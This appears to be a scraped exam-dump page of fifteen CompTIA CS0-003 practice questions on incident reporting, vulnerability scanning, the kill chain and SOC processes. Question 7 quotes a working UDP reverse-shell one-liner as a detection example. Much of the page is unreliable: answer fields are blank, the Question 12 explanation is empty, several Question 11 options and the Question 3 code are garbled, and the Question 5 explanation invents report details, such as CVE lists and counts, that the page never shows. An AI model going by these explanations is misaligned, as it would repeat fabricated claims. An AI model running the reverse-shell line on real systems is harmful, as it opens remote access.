CompTIA CS0-003 시험

Question No : 1

Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?

• A.Determine the sophistication of the audience that the report is meant for
• B.Include references and sources of information on the first page
• C.Include a table of contents outlining the entire report
• D.Decide on the color scheme that will effectively communicate the metrics

답을 확인하기

정답:
Explanation:
The best way to begin preparation for a report titled “What We Learned” regarding a recent incident involving a cybersecurity breach is to determine the sophistication of the audience that the report is meant for. The sophistication of the audience refers to their level of technical knowledge, understanding, or interest in cybersecurity topics. Determining the sophistication of the audience can help tailor the report content, language, tone, and format to suit their needs and expectations. For example, a report for executive management may be more concise, high-level, and business-oriented than a report for technical staff or peers.

Question No : 2

There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat.
Which of the following security controls would best support the company in this scenario?

• A.Implement step-up authentication for administrators
• B.Improve employee training and awareness
• C.Increase password complexity standards
• D.Deploy mobile device management

답을 확인하기

정답:
Explanation:
The best security control to implement against sensitive information being disclosed via file sharing services is to improve employee training and awareness. Employee training and awareness can help educate employees on the risks and consequences of using file sharing services for sensitive information, as well as the policies and procedures for handling such information securely and appropriately. Employee training and awareness can also help foster a security culture and encourage employees to report any incidents or violations of information security.

Question No : 3

A security analyst is trying to identify anomalies on the network routing.
Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?

• A.function x() { info=$(geoiplookup $1) && echo "$1 | $info" }
• B.function x() { info=$(ping -c 1 $1 | awk -F "/" ’END{print $5}’) && echo "$1 | $info" }
• C.function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" ’{print $1} ').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }
• D.function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo "$1 | $info" }

답을 확인하기

정답:
Explanation:
The function that can be used on a shell script to identify anomalies on the network routing most accurately is:
function x() { info=(dig(dig -x $1 | grep PTR | tail -n 1 | awk -F “.in-addr” ’{print $1} ').origin.asn.cymru.com TXT +short) && echo “$1 | $info” }
This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the
autonomous system number (ASN) and other information related to the IP address. The function then prints the IP address and the ASN information, which can help identify any routing anomalies or inconsistencies

Question No : 4

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data.
Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

• A.Credentialed network scanning
• B.Passive scanning
• C.Agent-based scanning
• D.Dynamic scanning

답을 확인하기

정답:
Explanation:
Agent-based scanning is a method that involves installing software agents on the target systems or networks that can perform local scans and report the results to a central server or console. Agent-based scanning can reduce the access to systems, as the agents do not require any credentials or permissions to scan the local system or network. Agent-based scanning can also provide the most accurate vulnerability scan results, as the agents can scan continuously or on-demand, regardless of the system or network status or location.

Question No : 5

An analyst is reviewing a vulnerability report for a server environment with the following entries:



Which of the following systems should be prioritized for patching first?

• A.10.101.27.98
• B.54.73.225.17
• C.54.74.110.26
• D.54.74.110.228

답을 확인하기

정답:
Explanation:
The system that should be prioritized for patching first is 54.74.110.228, as it has the highest number and severity of vulnerabilities among the four systems listed in the vulnerability report. According to the report, this system has 12 vulnerabilities, with 8 critical, 3 high, and 1 medium severity ratings. The critical vulnerabilities include CVE-2019-0708 (BlueKeep), CVE-2019-1182 (DejaBlue), CVE-2017-0144 (EternalBlue), and CVE-2017-0145 (EternalRomance), which are all remote code execution vulnerabilities that can allow an attacker to compromise the system without any user interaction or authentication. These vulnerabilities pose a high risk to the system and should be patched as soon as possible.

Question No : 6

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware.
Which of the following factors would an analyst most likely communicate as the reason for this escalation?

• A.Scope
• B.Weaponization
• C.CVSS
• D.Asset value

답을 확인하기

정답:
Explanation:
Weaponization is a factor that describes how an adversary develops or acquires an exploit or payload that can take advantage of a vulnerability and deliver a malicious effect. Weaponization can increase the severity or impact of a vulnerability, as it makes it easier or more likely for an attacker to exploit it successfully and cause damage or harm. Weaponization can also indicate the level of sophistication or motivation of an attacker, as well as the availability or popularity of an exploit or payload in the cyber threat landscape. In this case, an older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. This indicates that weaponization was the reason for this escalation.

Question No : 7

A security analyst detects an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
Which of the following is being attempted?

• A.RCE
• B.Reverse shell
• C.XSS
• D.SQL injection

답을 확인하기

정답:
Explanation:
A reverse shell is a type of shell access that allows a remote user to execute commands on a target system or network by reversing the normal direction of communication. A reverse shell is usually created by running a malicious script or program on the target system that connects back to the remote user’s system and opens a shell session. A reverse shell can bypass firewalls or other security controls that block incoming connections, as it uses an outgoing connection initiated by the target system. In this case, the security analyst has detected an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
This command is a shell script that creates a reverse shell connection from the target system to the remote user’s system at IP address 10.1.1.1 and port 4821 using UDP protocol.

Question No : 8

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic.
Which of the following would best meet this requirement?

• A.External
• B.Agent-based
• C.Non-credentialed
• D.Credentialed

답을 확인하기

정답:
Explanation:
Agent-based vulnerability scanning is a method that involves installing software agents on the target systems or networks that can perform local scans and report the results to a central server or console. Agent-based vulnerability scanning can reduce network traffic, as the scans are performed locally and only the results are transmitted over the network. Agent-based vulnerability scanning can also provide more accurate and up-to-date results, as the agents can scan continuously or on-demand, regardless of the system or network status or location.

Question No : 9

Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?

• A.Command and control
• B.Actions on objectives
• C.Exploitation
• D.Delivery

답을 확인하기

정답:
Explanation:
Command and control (C2) is a phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target. C2 enables the adversary to remotely control or manipulate the target system or network using various methods, such as malware callbacks, backdoors, botnets, or covert channels. C2 allows the adversary to maintain persistence, exfiltrate data, execute commands, deliver payloads, or spread to other systems or networks.

Question No : 10

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst.
Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

• A.SLA
• B.MOU
• C.NDA
• D.Limitation of liability

답을 확인하기

정답:
Explanation:
SLA stands for service level agreement, which is a contract or document that defines the expectations and obligations between a service provider and a customer regarding the quality, availability, performance, or scope of a service. An SLA may also specify the metrics, penalties, or remedies for measuring or ensuring compliance with the agreed service levels. An SLA can help the SOC manager review if the team is meeting the appropriate contractual obligations for the customer, such as response time, resolution time, reporting frequency, or communication channels.

Question No : 11

A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself.
Which of the following can the analyst perform to see the entire contents of the downloaded files?

• A.Change the display filter to f cp. accive. pore
• B.Change the display filter to tcg.port=20
• C.Change the display filter to f cp-daca and follow the TCP streams
• D.Navigate to the File menu and select FTP from the Export objects option

답을 확인하기

정답:
Explanation:
The best way to see the entire contents of the downloaded files in Wireshark is to change the display filter to ftp-data and follow the TCP streams. FTP-data is a protocol that is used to transfer files between an FTP client and server using TCP port 20. By filtering for ftp-data packets and following the TCP streams, the analyst can see the actual file data that was transferred during the FTP session

Question No : 12

An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country.
Which of the following describes what the analyst has noticed?

• A.Beaconing
• B.Cross-site scripting
• C.Buffer overflow
• D.PHP traversal

답을 확인하기

정답:
Explanation:

Question No : 13

A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization.
Which of the following will produce the data needed for the briefing?

• A.Firewall logs
• B.Indicators of compromise
• C.Risk assessment
• D.Access control lists

답을 확인하기

정답:
Explanation:
Indicators of compromise (IoCs) are pieces of data or evidence that suggest a system or network has been compromised by an attacker or malware. IoCs can include IP addresses, domain names, URLs, file hashes, registry keys, network traffic patterns, user behaviors, or system anomalies. IoCs can be used to detect, analyze, and respond to security incidents, as well as to share threat intelligence with other organizations or authorities. IoCs can produce the data needed for an executive briefing on possible threats to the organization, as they can provide information on the source, nature, scope, impact, and mitigation of the threats.

Question No : 14

Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?

• A.The lead should review what is documented in the incident response policy or plan
• B.Management level members of the CSIRT should make that decision
• C.The lead has the authority to decide who to communicate with at any t me
• D.Subject matter experts on the team should communicate with others within the specified area of expertise

답을 확인하기

정답:
Explanation:
The incident response policy or plan is a document that defines the roles and responsibilities, procedures and processes, communication and escalation protocols, and reporting and documentation requirements for handling security incidents. The lead should review what is documented in the incident response policy or plan to determine who should be communicated with and when during a security incident, as well as what information should be shared and how. The incident response policy or plan should also be aligned with the organizational policies and legal obligations regarding incident notification and disclosure.

Question No : 15

When starting an investigation, which of the following must be done first?

• A.Notify law enforcement
• B.Secure the scene
• C.Seize all related evidence
• D.Interview the witnesses

답을 확인하기

정답:
Explanation:
The first thing that must be done when starting an investigation is to secure the scene. Securing the scene involves isolating and protecting the area where the incident occurred, as well as any potential evidence or witnesses. Securing the scene can help prevent any tampering, contamination, or destruction of evidence, as well as any interference or obstruction of the investigation.